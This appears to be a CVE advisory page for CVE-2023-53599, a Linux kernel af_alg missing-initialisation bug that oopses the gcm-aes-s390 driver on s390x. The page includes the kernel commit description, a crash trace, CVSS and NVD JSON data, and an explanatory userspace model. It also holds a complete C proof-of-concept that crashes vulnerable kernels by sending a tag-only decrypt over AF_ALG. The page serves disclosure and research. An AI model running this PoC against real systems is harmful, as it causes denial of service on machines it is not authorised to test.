Security Vulnerability Report
CVE-2023-53599 CVSS 5.5 MEDIUM

CVE-2023-53599

Published: 2025-10-04 16:15:56
Last Modified: 2026-03-23 18:23:52
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

crypto: af_alg - Fix missing initialisation affecting gcm-aes-s390

Fix af_alg_alloc_areq() to initialise areq->first_rsgl.sgl.sgt.sgl to point to the scatterlist array in areq->first_rsgl.sgl.sgl.

Without this, the gcm-aes-s390 driver will oops when it tries to do gcm_walk_start() on req->dst because req->dst is set to the value of areq->first_rsgl.sgl.sgl by _aead_recvmsg() calling aead_request_set_crypt().

The problem comes if an empty ciphertext is passed: the loop in af_alg_get_rsgl() just passes straight out and doesn't set areq->first_rsgl up.

This isn't a problem on x86_64 using gcmaes_crypt_by_sg() because, as far as I can tell, that ignores req->dst and only uses req->src[*].

[*] Is this a bug in aesni-intel_glue.c?

The s390x oops looks something like:

 Unable to handle kernel pointer dereference in virtual kernel address space
 Failing address: 0000000a00000000 TEID: 0000000a00000803
 Fault in home space mode while using kernel ASCE.
 AS:00000000a43a0007 R3:0000000000000024
 Oops: 003b ilc:2 [#1] SMP
 ...
 Call Trace:
 [<000003ff7fc3d47e>] gcm_walk_start+0x16/0x28 [aes_s390]
 [<00000000a2a342f2>] crypto_aead_decrypt+0x9a/0xb8
 [<00000000a2a60888>] aead_recvmsg+0x478/0x698
 [<00000000a2e519a0>] sock_recvmsg+0x70/0xb0
 [<00000000a2e51a56>] sock_read_iter+0x76/0xa0
 [<00000000a273e066>] vfs_read+0x26e/0x2a8
 [<00000000a273e8c4>] ksys_read+0xbc/0x100
 [<00000000a311d808>] __do_syscall+0x1d0/0x1f8
 [<00000000a312ff30>] system_call+0x70/0x98
 Last Breaking-Event-Address:
 [<000003ff7fc3e6b4>] gcm_aes_crypt+0x104/0xa68 [aes_s390]
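
The mechanism in the commit message, as an added illustration that is not kernel code and not this page's PoC: a userspace C model of af_alg_alloc_areq() and the af_alg_get_rsgl() loop, with the kernel structs reduced to the fields that matter. The struct stand-ins, the 0xA5 poisoning that imitates recycled sock_kmalloc() memory, and the names alloc_areq, get_rsgl and dst_points_to_embedded_sgl are assumptions of this model. It shows why a zero-length output (empty ciphertext on decrypt) leaves req->dst pointing at allocator garbage on the unpatched path, and why the one-line initialisation from the fix closes that path.

```c
/*
 * Userspace model of the af_alg request allocation path for CVE-2023-53599.
 * NOT kernel code: simplified stand-ins for struct af_alg_sgl / af_alg_rsgl /
 * af_alg_async_req, with recycled kmalloc memory imitated by 0xA5 poisoning.
 */
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ALG_MAX_PAGES 16

struct scatterlist {            /* stand-in for the kernel's scatterlist entry */
	const void *addr;
	unsigned int length;
};

struct sg_table {               /* stand-in: pointer to the entry array + count */
	struct scatterlist *sgl;
	unsigned int nents;
};

struct af_alg_sgl {             /* 6.5+ shape: sg_table plus an embedded array */
	struct sg_table sgt;
	struct scatterlist sgl[ALG_MAX_PAGES + 1];
};

struct af_alg_rsgl {
	struct af_alg_sgl sgl;
	unsigned int sg_num_bytes;
};

struct af_alg_async_req {
	struct af_alg_rsgl first_rsgl;
};

/* af_alg_alloc_areq(): 'fixed' adds the single initialisation from the patch. */
static struct af_alg_async_req *alloc_areq(bool fixed)
{
	struct af_alg_async_req *areq = malloc(sizeof(*areq));
	if (!areq)
		return NULL;
	memset(areq, 0xA5, sizeof(*areq));  /* sock_kmalloc() does not zero memory */
	if (fixed)
		areq->first_rsgl.sgl.sgt.sgl = areq->first_rsgl.sgl.sgl;
	return areq;
}

/*
 * af_alg_get_rsgl(): maps the caller's output buffer into the RX scatterlist,
 * but only while output bytes remain. The loop body, including the
 * sgt.sgl initialisation it performs, never runs when outlen == 0.
 */
static void get_rsgl(struct af_alg_async_req *areq, size_t outlen,
		     const char *buf, size_t buflen)
{
	size_t len = 0;
	while (outlen > len && buflen > len) {
		struct af_alg_rsgl *rsgl = &areq->first_rsgl;   /* one rsgl suffices here */
		size_t seg = outlen - len < buflen - len ? outlen - len : buflen - len;
		rsgl->sgl.sgt.sgl = rsgl->sgl.sgl;
		rsgl->sgl.sgt.nents = 1;
		rsgl->sgl.sgl[0].addr = buf + len;
		rsgl->sgl.sgl[0].length = (unsigned int)seg;
		rsgl->sg_num_bytes = (unsigned int)seg;
		len += seg;
	}
}

/*
 * Performs the two steps _aead_recvmsg() runs before aead_request_set_crypt()
 * and reports whether the pointer it would hand over as req->dst is the
 * embedded array (safe) or stale allocator contents (what gcm_walk_start()
 * dereferenced on s390x).
 */
static bool dst_points_to_embedded_sgl(bool fixed, size_t outlen)
{
	char userbuf[64] = {0};                     /* constructed output buffer */
	struct af_alg_async_req *areq = alloc_areq(fixed);
	bool ok;

	if (!areq)
		return false;
	get_rsgl(areq, outlen, userbuf, sizeof(userbuf));
	ok = areq->first_rsgl.sgl.sgt.sgl == areq->first_rsgl.sgl.sgl;
	free(areq);
	return ok;
}

int main(void)
{
	printf("unpatched, 32-byte output: dst valid = %d\n", dst_points_to_embedded_sgl(false, 32));
	printf("unpatched, empty output:   dst valid = %d\n", dst_points_to_embedded_sgl(false, 0));
	printf("patched,   empty output:   dst valid = %d\n", dst_points_to_embedded_sgl(true, 0));
	return 0;
}
```

The model only reproduces the pointer-initialisation logic; the real request also carries the TX scatterlist holding the tag, which is why decryption still proceeds with a garbage destination rather than failing early.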

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel 6.5 up to but excluding 6.5.3 (versionStartIncluding 6.5, versionEndExcluding 6.5.3 in the NVD record below)
The affected code is the af_alg receive path of the 6.5 series; earlier LTS branches (6.1.x, 5.15.x, 5.10.x) are not within the affected range of this record. The fix is the two patch commits listed under References.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2023-53599 PoC - trigger the kernel oops via an empty ciphertext on AF_ALG.
 * Affected: Linux 6.5 before 6.5.3 with the gcm-aes-s390 driver on s390x.
 * Impact: gcm_walk_start() dereferences an uninitialised req->dst pointer
 *         (tracked as CWE-476), crashing the kernel (DoS). On x86_64 the
 *         aesni GCM path ignores req->dst, so no oops is expected there.
 *
 * "Empty ciphertext" means the decrypt request carries only the 16-byte
 * authentication tag: used == authsize, so outlen == 0 and the loop in
 * af_alg_get_rsgl() never initialises areq->first_rsgl.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/if_alg.h>

#ifndef SOL_ALG
#define SOL_ALG 279
#endif

int main(void)
{
	int tfmfd, opfd;
	struct sockaddr_alg sa = {
		.salg_family = AF_ALG,
		.salg_type = "aead",
		.salg_name = "gcm(aes)",
	};
	unsigned char key[32] = {0};   /* AES-256 key, all zero */
	unsigned char tag[16] = {0};   /* tag only: zero bytes of ciphertext, no AAD */
	char recv_buf[16];
	char cbuf[CMSG_SPACE(sizeof(unsigned int)) +
		  CMSG_SPACE(sizeof(struct af_alg_iv) + 12)] = {0};
	struct iovec iov = { .iov_base = tag, .iov_len = sizeof(tag) };
	struct msghdr msg = {0};
	struct cmsghdr *cmsg;
	struct af_alg_iv *iv;
	unsigned int op = ALG_OP_DECRYPT;
	ssize_t n;

	/* Create the AF_ALG transform socket and bind it to gcm(aes) */
	tfmfd = socket(AF_ALG, SOCK_SEQPACKET, 0);
	if (tfmfd < 0) { perror("socket"); return 1; }
	if (bind(tfmfd, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
		perror("bind"); close(tfmfd); return 1;
	}

	/* Key must be set before accept(); authsize 16 is GCM's default, set explicitly */
	if (setsockopt(tfmfd, SOL_ALG, ALG_SET_KEY, key, sizeof(key)) < 0) {
		perror("setsockopt ALG_SET_KEY"); close(tfmfd); return 1;
	}
	if (setsockopt(tfmfd, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, NULL, 16) < 0) {
		perror("setsockopt ALG_SET_AEAD_AUTHSIZE"); close(tfmfd); return 1;
	}

	/* Accept to obtain the operation fd */
	opfd = accept(tfmfd, NULL, 0);
	if (opfd < 0) { perror("accept"); close(tfmfd); return 1; }

	/* Control messages: decrypt operation and a 12-byte (all-zero) IV */
	msg.msg_iov = &iov;
	msg.msg_iovlen = 1;
	msg.msg_control = cbuf;
	msg.msg_controllen = sizeof(cbuf);

	cmsg = CMSG_FIRSTHDR(&msg);
	cmsg->cmsg_level = SOL_ALG;
	cmsg->cmsg_type = ALG_SET_OP;
	cmsg->cmsg_len = CMSG_LEN(sizeof(op));
	memcpy(CMSG_DATA(cmsg), &op, sizeof(op));

	cmsg = CMSG_NXTHDR(&msg, cmsg);
	cmsg->cmsg_level = SOL_ALG;
	cmsg->cmsg_type = ALG_SET_IV;
	cmsg->cmsg_len = CMSG_LEN(sizeof(*iv) + 12);
	iv = (struct af_alg_iv *)CMSG_DATA(cmsg);
	iv->ivlen = 12;
	memset(iv->iv, 0, 12);

	/* Send exactly authsize bytes: the kernel sees 0 bytes of ciphertext + tag */
	if (sendmsg(opfd, &msg, 0) != (ssize_t)sizeof(tag)) {
		perror("sendmsg"); close(opfd); close(tfmfd); return 1;
	}

	/*
	 * recvmsg -> aead_recvmsg -> crypto_aead_decrypt -> gcm_walk_start on the
	 * uninitialised req->dst. On a vulnerable s390x kernel this oopses; on a
	 * fixed kernel the read fails with EBADMSG (the zero tag does not verify).
	 */
	n = read(opfd, recv_buf, sizeof(recv_buf));
	if (n < 0)
		perror("read (EBADMSG is the expected result on a fixed kernel)");

	close(opfd);
	close(tfmfd);
	printf("PoC executed - check dmesg for a kernel oops\n");
	return 0;
}

References

https://git.kernel.org/stable/c/2c9d205040d7c0eaccc473917f9b0bb0a923e440 (Patch)
https://git.kernel.org/stable/c/6a4b8aa0a916b39a39175584c07222434fa6c6ef (Patch)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53599", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:56.497", "lastModified": "2026-03-23T18:23:52.000", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: af_alg - Fix missing initialisation affecting gcm-aes-s390\n\nFix af_alg_alloc_areq() to initialise areq->first_rsgl.sgl.sgt.sgl to point\nto the scatterlist array in areq->first_rsgl.sgl.sgl.\n\nWithout this, the gcm-aes-s390 driver will oops when it tries to do\ngcm_walk_start() on req->dst because req->dst is set to the value of\nareq->first_rsgl.sgl.sgl by _aead_recvmsg() calling\naead_request_set_crypt().\n\nThe problem comes if an empty ciphertext is passed: the loop in\naf_alg_get_rsgl() just passes straight out and doesn't set areq->first_rsgl\nup.\n\nThis isn't a problem on x86_64 using gcmaes_crypt_by_sg() because, as far\nas I can tell, that ignores req->dst and only uses req->src[*].\n\n[*] Is this a bug in aesni-intel_glue.c?\n\nThe s390x oops looks something like:\n\n Unable to handle kernel pointer dereference in virtual kernel address space\n Failing address: 0000000a00000000 TEID: 0000000a00000803\n Fault in home space mode while using kernel ASCE.\n AS:00000000a43a0007 R3:0000000000000024\n Oops: 003b ilc:2 [#1] SMP\n ...\n Call Trace:\n [<000003ff7fc3d47e>] gcm_walk_start+0x16/0x28 [aes_s390]\n [<00000000a2a342f2>] crypto_aead_decrypt+0x9a/0xb8\n [<00000000a2a60888>] aead_recvmsg+0x478/0x698\n [<00000000a2e519a0>] sock_recvmsg+0x70/0xb0\n [<00000000a2e51a56>] sock_read_iter+0x76/0xa0\n [<00000000a273e066>] vfs_read+0x26e/0x2a8\n [<00000000a273e8c4>] ksys_read+0xbc/0x100\n [<00000000a311d808>] __do_syscall+0x1d0/0x1f8\n [<00000000a312ff30>] system_call+0x70/0x98\n Last Breaking-Event-Address:\n [<000003ff7fc3e6b4>] gcm_aes_crypt+0x104/0xa68 [aes_s390]"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", 
"type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.5", "versionEndExcluding": "6.5.3", "matchCriteriaId": "880C803A-BEAE-4DA0-8A59-AC023F7B4EE3"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/2c9d205040d7c0eaccc473917f9b0bb0a923e440", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6a4b8aa0a916b39a39175584c07222434fa6c6ef", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}